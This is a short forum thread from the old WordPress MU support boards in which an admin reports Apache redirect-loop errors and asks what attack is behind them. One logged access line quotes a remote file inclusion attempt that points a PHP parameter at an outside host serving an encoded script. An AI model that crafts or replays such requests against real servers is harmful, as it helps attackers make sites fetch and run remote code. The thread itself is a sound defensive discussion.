The MU forums have moved to WordPress.org

Internal Redirection Error? (2 posts)

  1. fogster
    Member
    Posted 16 years ago #

    I'm running WPMU 1.3.3, and all seems to work well... Except that every once in a blue moon, Apache gets out of control. I just happened to catch it, and noticed the following:

    [Wed Apr 16 00:57:39 2008] [error] [client 67.18.241.218] Request exceeded the l
    imit of 10 internal redirects due to probable configuration error. Use 'LimitInt
    ernalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get
    a backtrace.

    Looking for that IP in access_log gives me the following:

    67.18.241.218 - - [16/Apr/2008:00:57:39 -0400] "GET /inc/header.php/step_one.php?server_inc=http://blackid.org/do.bo?? HTTP/1.1" 500 603 "-" "libwww-perl/5.65"

    (Among others)

    The do.bo file is a script of some kind, potentially an IRC bot. (It encodes most of its payload. Since it's not actually getting run, I'm not going to take the time to wade through it.)

    Has anyone seen this before? While they don't seem to be actually running their malicious code, it is causing a redirect loop. Has anyone seen this before? I've got a lot of additional RewriteRules, so I wanted to see if this was happening to anyone else (and it's thus a WPMU problem), or if it's just me (and it thus lies with my own mod_rewrite stuff). And in either case, I'm curious exactly what vulnerability they're trying to exploit. I'm surprised they're not getting a 404.

  2. Konstan
    Member
    Posted 16 years ago #

    I get about 10mb worth of that error per day in my error logs. The response I was given is just to increase the limit. Which did nothing :P

About this Topic